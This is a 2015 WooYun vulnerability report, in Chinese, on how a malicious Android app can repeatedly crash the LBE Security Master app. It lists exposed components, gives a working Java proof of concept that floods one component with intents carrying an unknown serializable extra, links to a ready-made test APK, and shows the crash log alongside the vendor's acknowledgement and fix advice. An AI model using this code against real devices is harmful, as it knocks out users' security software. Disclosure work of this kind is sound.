当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0105985

漏洞标题:无视主动防御利用多处缺陷使得LBE安全崩溃退出

相关厂商:lbesec.com

漏洞作者: Nicky

提交时间:2015-04-05 15:22

修复时间:2015-07-07 15:52

公开时间:2015-07-07 15:52

漏洞类型:设计错误/逻辑缺陷

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-05: 细节已通知厂商并且等待厂商处理中
2015-04-08: 厂商已经确认,细节仅向厂商公开
2015-04-11: 细节向第三方安全合作伙伴开放
2015-06-02: 细节向核心白帽子及相关领域专家公开
2015-06-12: 细节向普通白帽子公开
2015-06-22: 细节向实习白帽子公开
2015-07-07: 细节向公众公开

简要描述:

LBE安全大师存在多处缺陷可被恶意应用终止防护

详细说明:

作为一款安全应用自身安全性还是很重要的,经测试,LBE安卓最新版存在多处本地服务,在开启主动防御的情况可使得LBE安全大师无限崩溃;(测试时看到LBE有多个进程,在崩溃后一段时间会自动重启,但其实只要写个循环就行了,崩溃比重启快多了~~)
因为是漏洞,所以根本不需要关注啥主动防御,存在问题的组件有:
com.lbe.security.ui.phone2.PhoneMainActivity
com.lbe.security.ui.notificationmanager.NotificationManagerActivity
com.lbe.security.ui.tips.TipsWebActivity
com.lbe.security.ui.privacy.HipsMainActivity
com.lbe.security.ui.home.NewHomeActivity
com.lbe.security.ui.market.category.CategoryDetailsListActivity
com.lbe.security.ui.upgrade.UpdateManagerActivity
com.lbe.security.ui.optimize.WakePathActivity
利用代码:MainActivity.java

package com.example.myapp;
import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.content.ComponentName;
import java.io.Serializable;
public class MyActivity extends Activity {
    /**
     * Called when the activity is first created.
     */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        int n=20;
        while (n>0){
            Intent intent = new Intent();
            intent.setComponent(new ComponentName("com.lbe.security", "com.lbe.security.ui.optimize.WakePathActivity"));
            intent.putExtra("this_is_a_random_serializable_extra_for_test_general_reject_server", new SerializableObject());
            startActivity(intent);
            n--;
        }
    }
    static class SerializableObject implements Serializable {
        static final long serialVersionUID = 42L;
        SerializableObject() {
            super();
        }
    }
}


提供一个验证用的APK,安装后打开,LBE自动崩溃多次:
链接: http://pan.baidu.com/s/1bHVeI 密码: gam5

漏洞证明:

相关crash的logcat:

java.lang.RuntimeException: Unable to start activity 
                           ComponentInfo{com.lbe.security/com.lbe.security.ui.op
                           timize.WakePathActivity}: java.lang.RuntimeException:
                            Parcelable encounteredClassNotFoundException reading
                            a Serializable object (name = com.example.myapp.MyAc
                           tivity$SerializableObject)
                        W      at android.app.ActivityThread.performLaunchActivi
                           ty(ActivityThread.java:2371)
                        W      at android.app.ActivityThread.handleLaunchActivit
                           y(ActivityThread.java:2423)
                        W      at android.app.ActivityThread.access$800(Activity
                           Thread.java:155)
                        W      at android.app.ActivityThread$H.handleMessage(Act
                           ivityThread.java:1340)
                        W      at android.os.Handler.dispatchMessage(Handler.jav
                           a:110)
                        W      at android.os.Looper.loop(Looper.java:193)
                        W      at android.app.ActivityThread.main(ActivityThread
                           .java:5332)
                        W      at java.lang.reflect.Method.invokeNative(Native M
                           ethod)
                        W      at java.lang.reflect.Method.invoke(Method.java:51
                           5)
                        W      at com.android.internal.os.ZygoteInit$MethodAndAr
                           gsCaller.run(ZygoteInit.java:829)
                        W      at com.android.internal.os.ZygoteInit.main(Zygote
                           Init.java:645)
                        W      at dalvik.system.NativeStart.main(Native Method)
                        W  Caused by: java.lang.RuntimeException: Parcelable enc
                           ounteredClassNotFoundException reading a Serializable
                            object (name = com.example.myapp.MyActivity$Serializ
                           ableObject)
                        W      at android.os.Parcel.readSerializable(Parcel.java
                           :2219)
                        W      at android.os.Parcel.readValue(Parcel.java:2064)
                        W      at android.os.Parcel.readArrayMapInternal(Parcel.
                           java:2314)
                        W      at android.os.Bundle.unparcel(Bundle.java:249)
                        W      at android.os.Bundle.getString(Bundle.java:1118)
                        W      at android.content.Intent.getStringExtra(Intent.j
                           ava:4961)
                        W      at com.lbe.security.ui.optimize.WakePathActivity.
                           onCreate(WakePathActivity.java:86)
                        W      at android.app.Activity.performCreate(Activity.ja
                           va:5371)
                        W      at android.app.Instrumentation.callActivityOnCrea
                           te(Instrumentation.java:1106)
                        W      at com.lbe.client.zz.ba.callActivityOnCreate(Inst
                           rumentationDelegate.java:76)
                        W      at android.app.ActivityThread.performLaunchActivi
                           ty(ActivityThread.java:2335)
                        W      ... 11 more
                        W  Caused by: java.lang.ClassNotFoundException: com.exam
                           ple.myapp.MyActivity$SerializableObject
                        W      at java.lang.Class.classForName(Native Method)
                        W      at java.lang.Class.forName(Class.java:251)
                        W      at java.io.ObjectInputStream.resolveClass(ObjectI
                           nputStream.java:2266)
                        W      at java.io.ObjectInputStream.readNewClassDesc(Obj
                           ectInputStream.java:1644)
                        W      at java.io.ObjectInputStream.readClassDesc(Object
                           InputStream.java:658)
                        W      at java.io.ObjectInputStream.readNewObject(Object
                           InputStream.java:1785)
                        W      at java.io.ObjectInputStream.readNonPrimitiveCont
                           ent(ObjectInputStream.java:762)
                        W      at java.io.ObjectInputStream.readObject(ObjectInp
                           utStream.java:1986)
                        W      at java.io.ObjectInputStream.readObject(ObjectInp
                           utStream.java:1943)
                        W      at android.os.Parcel.readSerializable(Parcel.java
                           :2213)
                        W      ... 21 more
                        W  Caused by: java.lang.NoClassDefFoundError: com/exampl
                           e/myapp/MyActivity$SerializableObject
                        W      ... 31 more
                        W  Caused by: java.lang.ClassNotFoundException: Didn't f
                           ind class "com.example.myapp.MyActivity$SerializableO
                           bject" on path: DexPathList[[zip file "/data/app/com.
                           lbe.security-1.apk"],nativeLibraryDirectories=[/data/
                           app-lib/com.lbe.security-1, /vendor/lib, /system/lib]
                           ]
                        W      at dalvik.system.BaseDexClassLoader.findClass(Bas
                           eDexClassLoader.java:56)
                        W      at java.lang.ClassLoader.loadClass(ClassLoader.ja
                           va:497)
                        W      at java.lang.ClassLoader.loadClass(ClassLoader.ja
                           va:457)
                        W      ... 31 more
              dalvikvm  W  threadid=1: calling UncaughtExceptionHandler
                        I  +++ calling Ljava/lang/ThreadGroup;.uncaughtException
        AndroidRuntime  E  FATAL EXCEPTION: main
                        E  Process: com.lbe.security, PID: 7455
                        E  java.lang.RuntimeException: Unable to start activity 
                           ComponentInfo{com.lbe.security/com.lbe.security.ui.op
                           timize.WakePathActivity}: java.lang.RuntimeException:
                            Parcelable encounteredClassNotFoundException reading
                            a Serializable object (name = com.example.myapp.MyAc
                           tivity$SerializableObject)
                        E      at android.app.ActivityThread.performLaunchActivi
                           ty(ActivityThread.java:2371)
                        E      at android.app.ActivityThread.handleLaunchActivit
                           y(ActivityThread.java:2423)
                        E      at android.app.ActivityThread.access$800(Activity
                           Thread.java:155)
                        E      at android.app.ActivityThread$H.handleMessage(Act
                           ivityThread.java:1340)
                        E      at android.os.Handler.dispatchMessage(Handler.jav
                           a:110)
                        E      at android.os.Looper.loop(Looper.java:193)
                        E      at android.app.ActivityThread.main(ActivityThread
                           .java:5332)
                        E      at java.lang.reflect.Method.invokeNative(Native M
                           ethod)
                        E      at java.lang.reflect.Method.invoke(Method.java:51
                           5)
                        E      at com.android.internal.os.ZygoteInit$MethodAndAr
                           gsCaller.run(ZygoteInit.java:829)
                        E      at com.android.internal.os.ZygoteInit.main(Zygote
                           Init.java:645)
                        E      at dalvik.system.NativeStart.main(Native Method)
                        E  Caused by: java.lang.RuntimeException: Parcelable enc
                           ounteredClassNotFoundException reading a Serializable
                            object (name = com.example.myapp.MyActivity$Serializ
                           ableObject)
                        E      at android.os.Parcel.readSerializable(Parcel.java
                           :2219)
                        E      at android.os.Parcel.readValue(Parcel.java:2064)
                        E      at android.os.Parcel.readArrayMapInternal(Parcel.
                           java:2314)
                        E      at android.os.Bundle.unparcel(Bundle.java:249)
                        E      at android.os.Bundle.getString(Bundle.java:1118)
                        E      at android.content.Intent.getStringExtra(Intent.j
                           ava:4961)
                        E      at com.lbe.security.ui.optimize.WakePathActivity.
                           onCreate(WakePathActivity.java:86)
                        E      at android.app.Activity.performCreate(Activity.ja
                           va:5371)
                        E      at android.app.Instrumentation.callActivityOnCrea
                           te(Instrumentation.java:1106)
                        E      at com.lbe.client.zz.ba.callActivityOnCreate(Inst
                           rumentationDelegate.java:76)
                        E      at android.app.ActivityThread.performLaunchActivi
                           ty(ActivityThread.java:2335)
                        E      ... 11 more
                        E  Caused by: java.lang.ClassNotFoundException: com.exam
                           ple.myapp.MyActivity$SerializableObject
                        E      at java.lang.Class.classForName(Native Method)
                        E      at java.lang.Class.forName(Class.java:251)
                        E      at java.io.ObjectInputStream.resolveClass(ObjectI
                           nputStream.java:2266)
                        E      at java.io.ObjectInputStream.readNewClassDesc(Obj
                           ectInputStream.java:1644)
                        E      at java.io.ObjectInputStream.readClassDesc(Object
                           InputStream.java:658)
                        E      at java.io.ObjectInputStream.readNewObject(Object
                           InputStream.java:1785)
                        E      at java.io.ObjectInputStream.readNonPrimitiveCont
                           ent(ObjectInputStream.java:762)
                        E      at java.io.ObjectInputStream.readObject(ObjectInp
                           utStream.java:1986)
                        E      at java.io.ObjectInputStream.readObject(ObjectInp
                           utStream.java:1943)
                        E      at android.os.Parcel.readSerializable(Parcel.java
                           :2213)
                        E      ... 21 more
                        E  Caused by: java.lang.NoClassDefFoundError: com/exampl
                           e/myapp/MyActivity$SerializableObject
                        E      ... 31 more
                        E  Caused by: java.lang.ClassNotFoundException: Didn't f
                           ind class "com.example.myapp.MyActivity$SerializableO
                           bject" on path: DexPathList[[zip file "/data/app/com.
                           lbe.security-1.apk"],nativeLibraryDirectories=[/data/
                           app-lib/com.lbe.security-1, /vendor/lib, /system/lib]
                           ]
                        E      at dalvik.system.BaseDexClassLoader.findClass(Bas
                           eDexClassLoader.java:56)
                        E      at java.lang.ClassLoader.loadClass(ClassLoader.ja
                           va:497)
                        E      at java.lang.ClassLoader.loadClass(ClassLoader.ja
                           va:457)
                        E      ... 31 more
              dalvikvm  D  threadid=10: exiting
                        D  threadid=10: bye!
               Process  I  Sending signal. PID: 7455 SIG: 9
                           Process 7455 ended


S50405-115137.jpg

S50405-115207.jpg

修复方案:

严格校验接受数据的输入,如空指针,畸形数据,强制数据类型转换等异常情况的判断。

版权声明:转载请注明来源 Nicky@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-04-08 15:51

厂商回复:

感谢Nicky的研究和提交。LBE安全大师目前是双进程,主动防御的服务和UI不在一个进程,Nicky的方法的确可以导致LBE的UI进程崩溃,但这个时候主动防御并没有失效,依然在正常保护用户。但这样的设计缺陷的确不应该出现在一个安全产品中,对此我们非常抱歉,会在下一版本中立刻完善。再次感谢Nicky的辛勤工作!

最新状态:

暂无

漏洞评价:

评论

  1. 2015-09-23 18:49 | 骑虎打狗 ( 路人 | Rank:5 漏洞数:4 | 认真对待每个洞..)

    厂商的态度赞一个